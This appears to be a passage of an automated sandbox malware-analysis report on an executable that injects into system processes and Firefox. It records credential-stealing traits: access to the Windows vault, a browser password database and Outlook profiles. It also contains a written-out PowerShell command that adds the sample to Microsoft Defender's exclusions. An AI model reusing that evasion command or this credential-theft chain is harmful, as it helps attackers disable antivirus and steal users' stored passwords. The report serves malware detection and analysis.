Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 4p5XLVXJnq.exe	ReversingLabs: Detection: 68%
Source: 4p5XLVXJnq.exe	Virustotal: Detection: 72%

Source: unknown	Process created: C:\Users\user\Desktop\4p5XLVXJnq.exe "C:\Users\user\Desktop\4p5XLVXJnq.exe"
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe"
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process created: C:\Users\user\Desktop\4p5XLVXJnq.exe "C:\Users\user\Desktop\4p5XLVXJnq.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe "C:\Windows\SysWOW64\DpiScaling.exe"
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4p5XLVXJnq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process created: C:\Users\user\Desktop\4p5XLVXJnq.exe "C:\Users\user\Desktop\4p5XLVXJnq.exe"	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe "C:\Windows\SysWOW64\DpiScaling.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 4p5XLVXJnq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 4p5XLVXJnq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yAMzZKaZoBLE.exe, 00000008.00000000.2419490185.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000000.2596621789.00000000009DE000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: 4p5XLVXJnq.exe, 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000003.2525195033.000000000462B000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000003.2522433051.000000000447E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 4p5XLVXJnq.exe, 4p5XLVXJnq.exe, 00000004.00000002.2499471610.0000000001280000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, DpiScaling.exe, 00000009.00000003.2525195033.000000000462B000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 00000009.00000003.2522433051.000000000447E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DpiScaling.pdb source: 4p5XLVXJnq.exe, 00000004.00000002.2498176103.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yAMzZKaZoBLE.exe, 00000008.00000002.3910584978.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DpiScaling.pdbGCTL source: 4p5XLVXJnq.exe, 00000004.00000002.2498176103.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yAMzZKaZoBLE.exe, 00000008.00000002.3910584978.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 0_2_0319F028 pushad ; iretd	0_2_0319F029
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 0_2_0783D206 pushfd ; ret	0_2_0783D207
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 0_2_07835AD8 pushfd ; iretd	0_2_07835AE6
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0041987C push ss; ret	4_2_00419884
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00412008 push edi; iretd	4_2_00412014
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00418158 push ebp; iretd	4_2_00418159
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0041B1C1 push esp; ret	4_2_0041B1C5
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0041524A push ebp; iretd	4_2_0041527D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00407258 push eax; retf	4_2_004072E0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00407233 push eax; retf	4_2_004072E0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_004072E1 push eax; retf	4_2_004072E0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0041F373 push edi; iretd	4_2_0041F37F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00403310 push eax; ret	4_2_00403312
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0040AB25 push esp; ret	4_2_0040AB26
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00412C0F push ebx; iretd	4_2_00412C2B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00418E56 pushfd ; iretd	4_2_00418E99
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_004186EA push D99DE006h; ret	4_2_004186FD
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00418E9D push dword ptr [esi-79D6743Eh]; ret	4_2_00418EA4
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0128225F pushad ; ret	4_2_012827F9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012827FA pushad ; ret	4_2_012827F9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B09AD push ecx; mov dword ptr [esp], ecx	4_2_012B09B6
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0128283D push eax; iretd	4_2_01282858
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0128135E push eax; iretd	4_2_01281369
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_0694B61E push D99DE006h; ret	8_2_0694B631
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_0694C7B0 push ss; ret	8_2_0694C7B8
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_06944F3C push edi; iretd	8_2_06944F48
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_0694BD8A pushfd ; iretd	8_2_0694BDCD
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_0694BDD1 push dword ptr [esi-79D6743Eh]; ret	8_2_0694BDD8
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_0693DA59 push esp; ret	8_2_0693DA5A
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_06945B43 push ebx; iretd	8_2_06945B5F
Source: C:\Program Files (x86)\GlvujUmSQPSFYAmhfKWhnapJquKSJbOyxJDLzXuOFxYfjXNiFgQBTBfkYYV\yAMzZKaZoBLE.exe	Code function: 8_2_0694B08C push ebp; iretd	8_2_0694B08D

Source: 4p5XLVXJnq.exe

Static PE information: section name: .text entropy: 7.739346584194937

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
